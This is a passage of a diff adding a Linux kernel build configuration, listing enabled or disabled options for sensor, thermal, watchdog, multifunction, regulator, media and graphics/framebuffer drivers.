+CONFIG_W1_MASTER_DS1WM=m
+CONFIG_W1_MASTER_GPIO=m
+
+#
+# 1-wire Slaves
+#
+CONFIG_W1_SLAVE_THERM=m
+CONFIG_W1_SLAVE_SMEM=m
+CONFIG_W1_SLAVE_DS2408=m
+# CONFIG_W1_SLAVE_DS2408_READBACK is not set
+CONFIG_W1_SLAVE_DS2413=m
+CONFIG_W1_SLAVE_DS2406=m
+CONFIG_W1_SLAVE_DS2423=m
+CONFIG_W1_SLAVE_DS2431=m
+CONFIG_W1_SLAVE_DS2433=m
+# CONFIG_W1_SLAVE_DS2433_CRC is not set
+CONFIG_W1_SLAVE_DS2760=m
+CONFIG_W1_SLAVE_DS2780=m
+CONFIG_W1_SLAVE_DS2781=m
+CONFIG_W1_SLAVE_DS28E04=m
+CONFIG_W1_SLAVE_BQ27000=m
+# CONFIG_POWER_AVS is not set
+# CONFIG_POWER_RESET is not set
+CONFIG_POWER_SUPPLY=y
+# CONFIG_POWER_SUPPLY_DEBUG is not set
+# CONFIG_PDA_POWER is not set
+# CONFIG_TEST_POWER is not set
+# CONFIG_BATTERY_DS2760 is not set
+# CONFIG_BATTERY_DS2780 is not set
+# CONFIG_BATTERY_DS2781 is not set
+# CONFIG_BATTERY_DS2782 is not set
+# CONFIG_BATTERY_SBS is not set
+# CONFIG_BATTERY_BQ27XXX is not set
+# CONFIG_BATTERY_MAX17040 is not set
+# CONFIG_BATTERY_MAX17042 is not set
+# CONFIG_CHARGER_MAX8903 is not set
+# CONFIG_CHARGER_LP8727 is not set
+# CONFIG_CHARGER_GPIO is not set
+# CONFIG_CHARGER_MANAGER is not set
+# CONFIG_CHARGER_BQ2415X is not set
+# CONFIG_CHARGER_BQ24190 is not set
+# CONFIG_CHARGER_BQ24257 is not set
+# CONFIG_CHARGER_BQ24735 is not set
+# CONFIG_CHARGER_BQ25890 is not set
+# CONFIG_CHARGER_SMB347 is not set
+# CONFIG_BATTERY_GAUGE_LTC2941 is not set
+# CONFIG_CHARGER_RT9455 is not set
+CONFIG_HWMON=y
+CONFIG_HWMON_VID=m
+# CONFIG_HWMON_DEBUG_CHIP is not set
+
+#
+# Native drivers
+#
+CONFIG_SENSORS_ABITUGURU=m
+CONFIG_SENSORS_ABITUGURU3=m
+CONFIG_SENSORS_AD7314=m
+CONFIG_SENSORS_AD7414=m
+CONFIG_SENSORS_AD7418=m
+CONFIG_SENSORS_ADM1021=m
+CONFIG_SENSORS_ADM1025=m
+CONFIG_SENSORS_ADM1026=m
+CONFIG_SENSORS_ADM1029=m
+CONFIG_SENSORS_ADM1031=m
+CONFIG_SENSORS_ADM9240=m
+CONFIG_SENSORS_ADT7X10=m
+CONFIG_SENSORS_ADT7310=m
+CONFIG_SENSORS_ADT7410=m
+CONFIG_SENSORS_ADT7411=m
+CONFIG_SENSORS_ADT7462=m
+CONFIG_SENSORS_ADT7470=m
+CONFIG_SENSORS_ADT7475=m
+CONFIG_SENSORS_ASC7621=m
+CONFIG_SENSORS_K8TEMP=m
+CONFIG_SENSORS_K10TEMP=m
+CONFIG_SENSORS_FAM15H_POWER=m
+CONFIG_SENSORS_APPLESMC=m
+CONFIG_SENSORS_ASB100=m
+CONFIG_SENSORS_ATXP1=m
+CONFIG_SENSORS_DS620=m
+CONFIG_SENSORS_DS1621=m
+CONFIG_SENSORS_DELL_SMM=m
+CONFIG_SENSORS_I5K_AMB=m
+CONFIG_SENSORS_F71805F=m
+CONFIG_SENSORS_F71882FG=m
+CONFIG_SENSORS_F75375S=m
+CONFIG_SENSORS_FSCHMD=m
+# CONFIG_SENSORS_FTSTEUTATES is not set
+CONFIG_SENSORS_GL518SM=m
+CONFIG_SENSORS_GL520SM=m
+CONFIG_SENSORS_G760A=m
+CONFIG_SENSORS_G762=m
+CONFIG_SENSORS_GPIO_FAN=m
+CONFIG_SENSORS_HIH6130=m
+CONFIG_SENSORS_I5500=m
+CONFIG_SENSORS_CORETEMP=m
+CONFIG_SENSORS_IT87=m
+CONFIG_SENSORS_JC42=m
+CONFIG_SENSORS_POWR1220=m
+CONFIG_SENSORS_LINEAGE=m
+CONFIG_SENSORS_LTC2945=m
+CONFIG_SENSORS_LTC2990=m
+CONFIG_SENSORS_LTC4151=m
+CONFIG_SENSORS_LTC4215=m
+CONFIG_SENSORS_LTC4222=m
+CONFIG_SENSORS_LTC4245=m
+CONFIG_SENSORS_LTC4260=m
+CONFIG_SENSORS_LTC4261=m
+CONFIG_SENSORS_MAX1111=m
+CONFIG_SENSORS_MAX16065=m
+CONFIG_SENSORS_MAX1619=m
+CONFIG_SENSORS_MAX1668=m
+CONFIG_SENSORS_MAX197=m
+CONFIG_SENSORS_MAX31722=m
+CONFIG_SENSORS_MAX6639=m
+CONFIG_SENSORS_MAX6642=m
+CONFIG_SENSORS_MAX6650=m
+CONFIG_SENSORS_MAX6697=m
+CONFIG_SENSORS_MAX31790=m
+CONFIG_SENSORS_MCP3021=m
+CONFIG_SENSORS_ADCXX=m
+CONFIG_SENSORS_LM63=m
+CONFIG_SENSORS_LM70=m
+CONFIG_SENSORS_LM73=m
+CONFIG_SENSORS_LM75=m
+CONFIG_SENSORS_LM77=m
+CONFIG_SENSORS_LM78=m
+CONFIG_SENSORS_LM80=m
+CONFIG_SENSORS_LM83=m
+CONFIG_SENSORS_LM85=m
+CONFIG_SENSORS_LM87=m
+CONFIG_SENSORS_LM90=m
+CONFIG_SENSORS_LM92=m
+CONFIG_SENSORS_LM93=m
+CONFIG_SENSORS_LM95234=m
+CONFIG_SENSORS_LM95241=m
+CONFIG_SENSORS_LM95245=m
+CONFIG_SENSORS_PC87360=m
+CONFIG_SENSORS_PC87427=m
+CONFIG_SENSORS_NTC_THERMISTOR=m
+CONFIG_SENSORS_NCT6683=m
+CONFIG_SENSORS_NCT6775=m
+CONFIG_SENSORS_NCT7802=m
+CONFIG_SENSORS_NCT7904=m
+CONFIG_SENSORS_PCF8591=m
+CONFIG_PMBUS=m
+CONFIG_SENSORS_PMBUS=m
+# CONFIG_SENSORS_ADM1275 is not set
+# CONFIG_SENSORS_LM25066 is not set
+# CONFIG_SENSORS_LTC2978 is not set
+# CONFIG_SENSORS_LTC3815 is not set
+# CONFIG_SENSORS_MAX16064 is not set
+# CONFIG_SENSORS_MAX20751 is not set
+# CONFIG_SENSORS_MAX34440 is not set
+# CONFIG_SENSORS_MAX8688 is not set
+# CONFIG_SENSORS_TPS40422 is not set
+# CONFIG_SENSORS_UCD9000 is not set
+# CONFIG_SENSORS_UCD9200 is not set
+# CONFIG_SENSORS_ZL6100 is not set
+CONFIG_SENSORS_SHT15=m
+CONFIG_SENSORS_SHT21=m
+CONFIG_SENSORS_SHT3x=m
+CONFIG_SENSORS_SHTC1=m
+CONFIG_SENSORS_SIS5595=m
+CONFIG_SENSORS_DME1737=m
+CONFIG_SENSORS_EMC1403=m
+CONFIG_SENSORS_EMC2103=m
+CONFIG_SENSORS_EMC6W201=m
+CONFIG_SENSORS_SMSC47M1=m
+CONFIG_SENSORS_SMSC47M192=m
+CONFIG_SENSORS_SMSC47B397=m
+# CONFIG_SENSORS_SCH56XX_COMMON is not set
+# CONFIG_SENSORS_SCH5627 is not set
+# CONFIG_SENSORS_SCH5636 is not set
+CONFIG_SENSORS_SMM665=m
+CONFIG_SENSORS_ADC128D818=m
+CONFIG_SENSORS_ADS1015=m
+CONFIG_SENSORS_ADS7828=m
+CONFIG_SENSORS_ADS7871=m
+CONFIG_SENSORS_AMC6821=m
+CONFIG_SENSORS_INA209=m
+CONFIG_SENSORS_INA2XX=m
+CONFIG_SENSORS_INA3221=m
+CONFIG_SENSORS_TC74=m
+CONFIG_SENSORS_THMC50=m
+CONFIG_SENSORS_TMP102=m
+CONFIG_SENSORS_TMP103=m
+CONFIG_SENSORS_TMP401=m
+CONFIG_SENSORS_TMP421=m
+CONFIG_SENSORS_VIA_CPUTEMP=m
+CONFIG_SENSORS_VIA686A=m
+CONFIG_SENSORS_VT1211=m
+CONFIG_SENSORS_VT8231=m
+CONFIG_SENSORS_W83781D=m
+CONFIG_SENSORS_W83791D=m
+CONFIG_SENSORS_W83792D=m
+CONFIG_SENSORS_W83793=m
+CONFIG_SENSORS_W83795=m
+# CONFIG_SENSORS_W83795_FANCTRL is not set
+CONFIG_SENSORS_W83L785TS=m
+CONFIG_SENSORS_W83L786NG=m
+CONFIG_SENSORS_W83627HF=m
+CONFIG_SENSORS_W83627EHF=m
+
+#
+# ACPI drivers
+#
+CONFIG_SENSORS_ACPI_POWER=m
+CONFIG_SENSORS_ATK0110=m
+CONFIG_THERMAL=y
+CONFIG_THERMAL_HWMON=y
+CONFIG_THERMAL_WRITABLE_TRIPS=y
+CONFIG_THERMAL_DEFAULT_GOV_STEP_WISE=y
+# CONFIG_THERMAL_DEFAULT_GOV_FAIR_SHARE is not set
+# CONFIG_THERMAL_DEFAULT_GOV_USER_SPACE is not set
+# CONFIG_THERMAL_DEFAULT_GOV_POWER_ALLOCATOR is not set
+# CONFIG_THERMAL_GOV_FAIR_SHARE is not set
+CONFIG_THERMAL_GOV_STEP_WISE=y
+CONFIG_THERMAL_GOV_BANG_BANG=y
+CONFIG_THERMAL_GOV_USER_SPACE=y
+# CONFIG_THERMAL_GOV_POWER_ALLOCATOR is not set
+# CONFIG_THERMAL_EMULATION is not set
+CONFIG_INTEL_POWERCLAMP=m
+CONFIG_INTEL_SOC_DTS_IOSF_CORE=m
+CONFIG_INTEL_SOC_DTS_THERMAL=m
+
+#
+# ACPI INT340X thermal drivers
+#
+CONFIG_INT340X_THERMAL=m
+CONFIG_ACPI_THERMAL_REL=m
+CONFIG_INT3406_THERMAL=m
+CONFIG_INTEL_PCH_THERMAL=m
+CONFIG_WATCHDOG=y
+CONFIG_WATCHDOG_CORE=y
+# CONFIG_WATCHDOG_NOWAYOUT is not set
+# CONFIG_WATCHDOG_SYSFS is not set
+
+#
+# Watchdog Device Drivers
+#
+CONFIG_SOFT_WATCHDOG=m
+CONFIG_WDAT_WDT=m
+CONFIG_XILINX_WATCHDOG=m
+CONFIG_ZIIRAVE_WATCHDOG=m
+CONFIG_CADENCE_WATCHDOG=m
+CONFIG_DW_WATCHDOG=m
+CONFIG_MAX63XX_WATCHDOG=m
+CONFIG_ACQUIRE_WDT=m
+CONFIG_ADVANTECH_WDT=m
+CONFIG_ALIM1535_WDT=m
+CONFIG_ALIM7101_WDT=m
+CONFIG_F71808E_WDT=m
+CONFIG_SP5100_TCO=m
+CONFIG_SBC_FITPC2_WATCHDOG=m
+CONFIG_EUROTECH_WDT=m
+CONFIG_IB700_WDT=m
+CONFIG_IBMASR=m
+CONFIG_WAFER_WDT=m
+CONFIG_I6300ESB_WDT=m
+CONFIG_IE6XX_WDT=m
+CONFIG_ITCO_WDT=m
+CONFIG_ITCO_VENDOR_SUPPORT=y
+CONFIG_IT8712F_WDT=m
+CONFIG_IT87_WDT=m
+CONFIG_HP_WATCHDOG=m
+CONFIG_HPWDT_NMI_DECODING=y
+CONFIG_SC1200_WDT=m
+CONFIG_PC87413_WDT=m
+CONFIG_NV_TCO=m
+CONFIG_60XX_WDT=m
+CONFIG_CPU5_WDT=m
+CONFIG_SMSC_SCH311X_WDT=m
+CONFIG_SMSC37B787_WDT=m
+CONFIG_VIA_WDT=m
+CONFIG_W83627HF_WDT=m
+CONFIG_W83877F_WDT=m
+CONFIG_W83977F_WDT=m
+CONFIG_MACHZ_WDT=m
+CONFIG_SBC_EPX_C3_WATCHDOG=m
+CONFIG_NI903X_WDT=m
+CONFIG_MEN_A21_WDT=m
+
+#
+# PCI-based Watchdog Cards
+#
+CONFIG_PCIPCWATCHDOG=m
+CONFIG_WDTPCI=m
+
+#
+# USB-based Watchdog Cards
+#
+CONFIG_USBPCWATCHDOG=m
+
+#
+# Watchdog Pretimeout Governors
+#
+CONFIG_WATCHDOG_PRETIMEOUT_GOV=y
+# CONFIG_WATCHDOG_PRETIMEOUT_DEFAULT_GOV_NOOP is not set
+CONFIG_WATCHDOG_PRETIMEOUT_DEFAULT_GOV_PANIC=y
+# CONFIG_WATCHDOG_PRETIMEOUT_GOV_NOOP is not set
+CONFIG_WATCHDOG_PRETIMEOUT_GOV_PANIC=y
+CONFIG_SSB_POSSIBLE=y
+
+#
+# Sonics Silicon Backplane
+#
+CONFIG_SSB=m
+CONFIG_SSB_SPROM=y
+CONFIG_SSB_BLOCKIO=y
+CONFIG_SSB_PCIHOST_POSSIBLE=y
+CONFIG_SSB_PCIHOST=y
+CONFIG_SSB_B43_PCI_BRIDGE=y
+CONFIG_SSB_PCMCIAHOST_POSSIBLE=y
+# CONFIG_SSB_PCMCIAHOST is not set
+CONFIG_SSB_SDIOHOST_POSSIBLE=y
+# CONFIG_SSB_SDIOHOST is not set
+# CONFIG_SSB_SILENT is not set
+# CONFIG_SSB_DEBUG is not set
+CONFIG_SSB_DRIVER_PCICORE_POSSIBLE=y
+CONFIG_SSB_DRIVER_PCICORE=y
+# CONFIG_SSB_DRIVER_GPIO is not set
+CONFIG_BCMA_POSSIBLE=y
+
+#
+# Broadcom specific AMBA
+#
+CONFIG_BCMA=m
+CONFIG_BCMA_BLOCKIO=y
+CONFIG_BCMA_HOST_PCI_POSSIBLE=y
+# CONFIG_BCMA_HOST_PCI is not set
+# CONFIG_BCMA_HOST_SOC is not set
+# CONFIG_BCMA_DRIVER_PCI is not set
+# CONFIG_BCMA_DRIVER_GMAC_CMN is not set
+# CONFIG_BCMA_DRIVER_GPIO is not set
+# CONFIG_BCMA_DEBUG is not set
+
+#
+# Multifunction device drivers
+#
+CONFIG_MFD_CORE=m
+# CONFIG_MFD_AS3711 is not set
+# CONFIG_PMIC_ADP5520 is not set
+# CONFIG_MFD_AAT2870_CORE is not set
+# CONFIG_MFD_BCM590XX is not set
+# CONFIG_MFD_AXP20X_I2C is not set
+# CONFIG_MFD_CROS_EC is not set
+# CONFIG_PMIC_DA903X is not set
+# CONFIG_MFD_DA9052_SPI is not set
+# CONFIG_MFD_DA9052_I2C is not set
+# CONFIG_MFD_DA9055 is not set
+# CONFIG_MFD_DA9062 is not set
+# CONFIG_MFD_DA9063 is not set
+# CONFIG_MFD_DA9150 is not set
+# CONFIG_MFD_DLN2 is not set
+# CONFIG_MFD_EXYNOS_LPASS is not set
+# CONFIG_MFD_MC13XXX_SPI is not set
+# CONFIG_MFD_MC13XXX_I2C is not set
+# CONFIG_HTC_PASIC3 is not set
+# CONFIG_HTC_I2CPLD is not set
+CONFIG_MFD_INTEL_QUARK_I2C_GPIO=m
+CONFIG_LPC_ICH=m
+CONFIG_LPC_SCH=m
+# CONFIG_INTEL_SOC_PMIC is not set
+CONFIG_MFD_INTEL_LPSS=m
+CONFIG_MFD_INTEL_LPSS_ACPI=m
+CONFIG_MFD_INTEL_LPSS_PCI=m
+# CONFIG_MFD_JANZ_CMODIO is not set
+# CONFIG_MFD_KEMPLD is not set
+# CONFIG_MFD_88PM800 is not set
+# CONFIG_MFD_88PM805 is not set
+# CONFIG_MFD_88PM860X is not set
+# CONFIG_MFD_MAX14577 is not set
+# CONFIG_MFD_MAX77693 is not set
+# CONFIG_MFD_MAX77843 is not set
+# CONFIG_MFD_MAX8907 is not set
+# CONFIG_MFD_MAX8925 is not set
+# CONFIG_MFD_MAX8997 is not set
+# CONFIG_MFD_MAX8998 is not set
+# CONFIG_MFD_MT6397 is not set
+# CONFIG_MFD_MENF21BMC is not set
+# CONFIG_EZX_PCAP is not set
+# CONFIG_MFD_VIPERBOARD is not set
+# CONFIG_MFD_RETU is not set
+# CONFIG_MFD_PCF50633 is not set
+CONFIG_MFD_RDC321X=m
+CONFIG_MFD_RTSX_PCI=m
+# CONFIG_MFD_RT5033 is not set
+CONFIG_MFD_RTSX_USB=m
+# CONFIG_MFD_RC5T583 is not set
+# CONFIG_MFD_SEC_CORE is not set
+# CONFIG_MFD_SI476X_CORE is not set
+# CONFIG_MFD_SM501 is not set
+# CONFIG_MFD_SKY81452 is not set
+# CONFIG_MFD_SMSC is not set
+# CONFIG_ABX500_CORE is not set
+# CONFIG_MFD_SYSCON is not set
+# CONFIG_MFD_TI_AM335X_TSCADC is not set
+# CONFIG_MFD_LP3943 is not set
+# CONFIG_MFD_LP8788 is not set
+# CONFIG_MFD_PALMAS is not set
+# CONFIG_TPS6105X is not set
+# CONFIG_TPS65010 is not set
+# CONFIG_TPS6507X is not set
+# CONFIG_MFD_TPS65086 is not set
+# CONFIG_MFD_TPS65090 is not set
+# CONFIG_MFD_TPS65217 is not set
+# CONFIG_MFD_TI_LP873X is not set
+# CONFIG_MFD_TPS65218 is not set
+# CONFIG_MFD_TPS6586X is not set
+# CONFIG_MFD_TPS65910 is not set
+# CONFIG_MFD_TPS65912_I2C is not set
+# CONFIG_MFD_TPS65912_SPI is not set
+# CONFIG_MFD_TPS80031 is not set
+# CONFIG_TWL4030_CORE is not set
+# CONFIG_TWL6040_CORE is not set
+# CONFIG_MFD_WL1273_CORE is not set
+# CONFIG_MFD_LM3533 is not set
+# CONFIG_MFD_TMIO is not set
+# CONFIG_MFD_VX855 is not set
+# CONFIG_MFD_ARIZONA_I2C is not set
+# CONFIG_MFD_ARIZONA_SPI is not set
+# CONFIG_MFD_WM8400 is not set
+# CONFIG_MFD_WM831X_I2C is not set
+# CONFIG_MFD_WM831X_SPI is not set
+# CONFIG_MFD_WM8350_I2C is not set
+# CONFIG_MFD_WM8994 is not set
+CONFIG_REGULATOR=y
+# CONFIG_REGULATOR_DEBUG is not set
+# CONFIG_REGULATOR_FIXED_VOLTAGE is not set
+# CONFIG_REGULATOR_VIRTUAL_CONSUMER is not set
+CONFIG_REGULATOR_USERSPACE_CONSUMER=m
+# CONFIG_REGULATOR_ACT8865 is not set
+# CONFIG_REGULATOR_AD5398 is not set
+# CONFIG_REGULATOR_DA9210 is not set
+# CONFIG_REGULATOR_DA9211 is not set
+# CONFIG_REGULATOR_FAN53555 is not set
+CONFIG_REGULATOR_GPIO=m
+# CONFIG_REGULATOR_ISL9305 is not set
+# CONFIG_REGULATOR_ISL6271A is not set
+# CONFIG_REGULATOR_LP3971 is not set
+# CONFIG_REGULATOR_LP3972 is not set
+# CONFIG_REGULATOR_LP872X is not set
+# CONFIG_REGULATOR_LP8755 is not set
+# CONFIG_REGULATOR_LTC3589 is not set
+# CONFIG_REGULATOR_LTC3676 is not set
+# CONFIG_REGULATOR_MAX1586 is not set
+# CONFIG_REGULATOR_MAX8649 is not set
+# CONFIG_REGULATOR_MAX8660 is not set
+# CONFIG_REGULATOR_MAX8952 is not set
+# CONFIG_REGULATOR_MT6311 is not set
+# CONFIG_REGULATOR_PFUZE100 is not set
+# CONFIG_REGULATOR_PV88060 is not set
+# CONFIG_REGULATOR_PV88080 is not set
+# CONFIG_REGULATOR_PV88090 is not set
+# CONFIG_REGULATOR_TPS51632 is not set
+# CONFIG_REGULATOR_TPS62360 is not set
+# CONFIG_REGULATOR_TPS65023 is not set
+# CONFIG_REGULATOR_TPS6507X is not set
+# CONFIG_REGULATOR_TPS6524X is not set
+CONFIG_MEDIA_SUPPORT=m
+
+#
+# Multimedia core support
+#
+CONFIG_MEDIA_CAMERA_SUPPORT=y
+# CONFIG_MEDIA_ANALOG_TV_SUPPORT is not set
+# CONFIG_MEDIA_DIGITAL_TV_SUPPORT is not set
+# CONFIG_MEDIA_RADIO_SUPPORT is not set
+CONFIG_MEDIA_SDR_SUPPORT=y
+# CONFIG_MEDIA_RC_SUPPORT is not set
+# CONFIG_MEDIA_CONTROLLER is not set
+CONFIG_VIDEO_DEV=m
+CONFIG_VIDEO_V4L2=m
+# CONFIG_VIDEO_ADV_DEBUG is not set
+# CONFIG_VIDEO_FIXED_MINOR_RANGES is not set
+# CONFIG_VIDEO_PCI_SKELETON is not set
+CONFIG_VIDEOBUF_GEN=m
+CONFIG_VIDEOBUF2_CORE=m
+CONFIG_VIDEOBUF2_MEMOPS=m
+CONFIG_VIDEOBUF2_DMA_CONTIG=m
+CONFIG_VIDEOBUF2_VMALLOC=m
+CONFIG_VIDEOBUF2_DMA_SG=m
+# CONFIG_TTPCI_EEPROM is not set
+
+#
+# Media drivers
+#
+# CONFIG_MEDIA_USB_SUPPORT is not set
+# CONFIG_MEDIA_PCI_SUPPORT is not set
+CONFIG_V4L_PLATFORM_DRIVERS=y
+CONFIG_VIDEO_CAFE_CCIC=m
+CONFIG_SOC_CAMERA=m
+CONFIG_SOC_CAMERA_PLATFORM=m
+# CONFIG_V4L_MEM2MEM_DRIVERS is not set
+# CONFIG_V4L_TEST_DRIVERS is not set
+
+#
+# Supported MMC/SDIO adapters
+#
+# CONFIG_CYPRESS_FIRMWARE is not set
+
+#
+# Media ancillary drivers (tuners, sensors, i2c, spi, frontends)
+#
+CONFIG_MEDIA_SUBDRV_AUTOSELECT=y
+
+#
+# Audio decoders, processors and mixers
+#
+
+#
+# RDS decoders
+#
+
+#
+# Video decoders
+#
+
+#
+# Video and audio decoders
+#
+
+#
+# Video encoders
+#
+
+#
+# Camera sensor devices
+#
+CONFIG_VIDEO_OV7670=m
+CONFIG_VIDEO_MT9M111=m
+
+#
+# Flash devices
+#
+
+#
+# Video improvement chips
+#
+
+#
+# Audio/Video compression chips
+#
+
+#
+# Miscellaneous helper chips
+#
+
+#
+# Sensors used on soc_camera driver
+#
+
+#
+# soc_camera sensor drivers
+#
+CONFIG_SOC_CAMERA_IMX074=m
+CONFIG_SOC_CAMERA_MT9M001=m
+CONFIG_SOC_CAMERA_MT9M111=m
+CONFIG_SOC_CAMERA_MT9T031=m
+CONFIG_SOC_CAMERA_MT9T112=m
+CONFIG_SOC_CAMERA_MT9V022=m
+CONFIG_SOC_CAMERA_OV2640=m
+CONFIG_SOC_CAMERA_OV5642=m
+CONFIG_SOC_CAMERA_OV6650=m
+CONFIG_SOC_CAMERA_OV772X=m
+CONFIG_SOC_CAMERA_OV9640=m
+CONFIG_SOC_CAMERA_OV9740=m
+CONFIG_SOC_CAMERA_RJ54N1=m
+CONFIG_SOC_CAMERA_TW9910=m
+CONFIG_MEDIA_TUNER=m
+CONFIG_MEDIA_TUNER_SIMPLE=m
+CONFIG_MEDIA_TUNER_TDA8290=m
+CONFIG_MEDIA_TUNER_TDA827X=m
+CONFIG_MEDIA_TUNER_TDA18271=m
+CONFIG_MEDIA_TUNER_TDA9887=m
+CONFIG_MEDIA_TUNER_MT20XX=m
+CONFIG_MEDIA_TUNER_XC2028=m
+CONFIG_MEDIA_TUNER_XC5000=m
+CONFIG_MEDIA_TUNER_XC4000=m
+CONFIG_MEDIA_TUNER_MC44S803=m
+
+#
+# Tools to develop new frontends
+#
+# CONFIG_DVB_DUMMY_FE is not set
+
+#
+# Graphics support
+#
+CONFIG_AGP=y
+CONFIG_AGP_AMD64=m
+CONFIG_AGP_INTEL=m
+# CONFIG_AGP_SIS is not set
+# CONFIG_AGP_VIA is not set
+CONFIG_INTEL_GTT=m
+CONFIG_VGA_ARB=y
+CONFIG_VGA_ARB_MAX_GPUS=1
+# CONFIG_VGA_SWITCHEROO is not set
+CONFIG_DRM=y
+CONFIG_DRM_MIPI_DSI=y
+# CONFIG_DRM_DP_AUX_CHARDEV is not set
+CONFIG_DRM_KMS_HELPER=y
+CONFIG_DRM_KMS_FB_HELPER=y
+CONFIG_DRM_FBDEV_EMULATION=y
+# CONFIG_DRM_LOAD_EDID_FIRMWARE is not set
+CONFIG_DRM_TTM=y
+
+#
+# I2C encoder or helper chips
+#
+# CONFIG_DRM_I2C_CH7006 is not set
+# CONFIG_DRM_I2C_SIL164 is not set
+# CONFIG_DRM_I2C_NXP_TDA998X is not set
+CONFIG_DRM_RADEON=m
+CONFIG_DRM_RADEON_USERPTR=y
+CONFIG_DRM_AMDGPU=m
+# CONFIG_DRM_AMDGPU_SI is not set
+# CONFIG_DRM_AMDGPU_CIK is not set
+# CONFIG_DRM_AMDGPU_USERPTR is not set
+# CONFIG_DRM_AMDGPU_GART_DEBUGFS is not set
+
+#
+# ACP (Audio CoProcessor) Configuration
+#
+CONFIG_DRM_AMD_ACP=y
+CONFIG_DRM_NOUVEAU=m
+CONFIG_NOUVEAU_DEBUG=5
+CONFIG_NOUVEAU_DEBUG_DEFAULT=3
+CONFIG_DRM_NOUVEAU_BACKLIGHT=y
+CONFIG_DRM_I915=m
+# CONFIG_DRM_I915_PRELIMINARY_HW_SUPPORT is not set
+CONFIG_DRM_I915_USERPTR=y
+CONFIG_DRM_I915_GVT=y
+
+#
+# drm/i915 Debugging
+#
+# CONFIG_DRM_I915_WERROR is not set
+# CONFIG_DRM_I915_DEBUG is not set
+CONFIG_DRM_VGEM=y
+CONFIG_DRM_VMWGFX=m
+CONFIG_DRM_VMWGFX_FBCON=y
+CONFIG_DRM_GMA500=m
+CONFIG_DRM_GMA600=y
+CONFIG_DRM_GMA3600=y
+CONFIG_DRM_UDL=m
+# CONFIG_DRM_AST is not set
+# CONFIG_DRM_MGAG200 is not set
+# CONFIG_DRM_CIRRUS_QEMU is not set
+CONFIG_DRM_QXL=y
+CONFIG_DRM_BOCHS=y
+CONFIG_DRM_VIRTIO_GPU=y
+CONFIG_DRM_PANEL=y
+
+#
+# Display Panels
+#
+CONFIG_DRM_BRIDGE=y
+
+#
+# Display Interface Bridges
+#
+# CONFIG_DRM_ANALOGIX_ANX78XX is not set
+# CONFIG_DRM_LEGACY is not set
+
+#
+# Frame buffer Devices
+#
+CONFIG_FB=y
+# CONFIG_FIRMWARE_EDID is not set
+CONFIG_FB_CMDLINE=y
+CONFIG_FB_NOTIFY=y
+# CONFIG_FB_DDC is not set
+CONFIG_FB_BOOT_VESA_SUPPORT=y
+CONFIG_FB_CFB_FILLRECT=y
+CONFIG_FB_CFB_COPYAREA=y
+CONFIG_FB_CFB_IMAGEBLIT=y
+# CONFIG_FB_CFB_REV_PIXELS_IN_BYTE is not set
+CONFIG_FB_SYS_FILLRECT=y
+CONFIG_FB_SYS_COPYAREA=y
+CONFIG_FB_SYS_IMAGEBLIT=y
+# CONFIG_FB_FOREIGN_ENDIAN is not set
+CONFIG_FB_SYS_FOPS=y
+CONFIG_FB_DEFERRED_IO=y
+# CONFIG_FB_SVGALIB is not set
+# CONFIG_FB_MACMODES is not set
+CONFIG_FB_BACKLIGHT=y
+# CONFIG_FB_MODE_HELPERS is not set
+# CONFIG_FB_TILEBLITTING is not set
+
+#
+# Frame buffer hardware drivers
+#
+# CONFIG_FB_CIRRUS is not set
+# CONFIG_FB_PM2 is not set
+# CONFIG_FB_CYBER2000 is not set
+# CONFIG_FB_ARC is not set
+# CONFIG_FB_ASILIANT is not set
+# CONFIG_FB_IMSTT is not set
+# CONFIG_FB_VGA16 is not set
+# CONFIG_FB_UVESA is not set
+CONFIG_FB_VESA=y
+CONFIG_FB_EFI=y
+# CONFIG_FB_N411 is not set
+# CONFIG_FB_HGA is not set
+# CONFIG_FB_OPENCORES is not set
+# CONFIG_FB_S1D13XXX is not set
+# CONFIG_FB_NVIDIA is not set
+# CONFIG_FB_RIVA is not set
+# CONFIG_FB_I740 is not set
+# CONFIG_FB_LE80578 is not set
+# CONFIG_FB_INTEL is not set
+# CONFIG_FB_MATROX is not set
+# CONFIG_FB_RADEON is not set
+# CONFIG_FB_ATY128 is not set
+# CONFIG_FB_ATY is not set
+# CONFIG_FB_S3 is not set
+# CONFIG_FB_SAVAGE is not set
+# CONFIG_FB_SIS is not set
+# CONFIG_FB_VIA is not set
+# CONFIG_FB_NEOMAGIC is not set
+# CONFIG_FB_KYRO is not set
+# CONFIG_FB_3DFX is not set
+# CONFIG_FB_VOODOO1 is not set
+# CONFIG_FB_VT8623 is not set
+# CONFIG_FB_TRIDENT is not set
+# CONFIG_FB_ARK is not set
+# CONFIG_FB_PM3 is not set
+# CONFIG_FB_CARMINE is not set
+# CONFIG_FB_SMSCUFX is not set
+# CONFIG_FB_UDL is not set
+# CONFIG_FB_IBM_GXT4500 is not set
+# CONFIG_FB_VIRTUAL is not set
+# CONFIG_FB_METRONOME is not set
+# CONFIG_FB_MB862XX is not set
+# CONFIG_FB_BROADSHEET is not set
+# CONFIG_FB_AUO_K190X is not set
+CONFIG_FB_SIMPLE=y
+# CONFIG_FB_SM712 is not set
+CONFIG_BACKLIGHT_LCD_SUPPORT=y
+CONFIG_LCD_CLASS_DEVICE=m
+# CONFIG_LCD_L4F00242T03 is not set
+# CONFIG_LCD_LMS283GF05 is not set
+# CONFIG_LCD_LTV350QV is not set
+# CONFIG_LCD_ILI922X is not set
+# CONFIG_LCD_ILI9320 is not set
+# CONFIG_LCD_TDO24M is not set
+# CONFIG_LCD_VGG2432A4 is not set
+# CONFIG_LCD_PLATFORM is not set
+# CONFIG_LCD_S6E63M0 is not set
+# CONFIG_LCD_LD9040 is not set
+# CONFIG_LCD_AMS369FG06 is not set
+# CONFIG_LCD_LMS501KF03 is not set
+# CONFIG_LCD_HX8357 is not set
+CONFIG_BACKLIGHT_CLASS_DEVICE=y
+CONFIG_BACKLIGHT_GENERIC=m
+# CONFIG_BACKLIGHT_APPLE is not set
+# CONFIG_BACKLIGHT_PM8941_WLED is not set
+# CONFIG_BACKLIGHT_SAHARA is not set
+# CONFIG_BACKLIGHT_ADP8860 is not set
+# CONFIG_BACKLIGHT_ADP8870 is not set
+# CONFIG_BACKLIGHT_LM3639 is not set
+# CONFIG_BACKLIGHT_GPIO is not set
+# CONFIG_BACKLIGHT_LV5207LP is not set
+# CONFIG_BACKLIGHT_BD6107 is not set
+# CONFIG_VGASTATE is not set
+CONFIG_HDMI=y
+
+#
+# Console display driver support
+#
+CONFIG_VGA_CONSOLE=y
+CONFIG_VGACON_SOFT_SCROLLBACK=y
+CONFIG_VGACON_SOFT_SCROLLBACK_SIZE=64
+CONFIG_DUMMY_CONSOLE=y
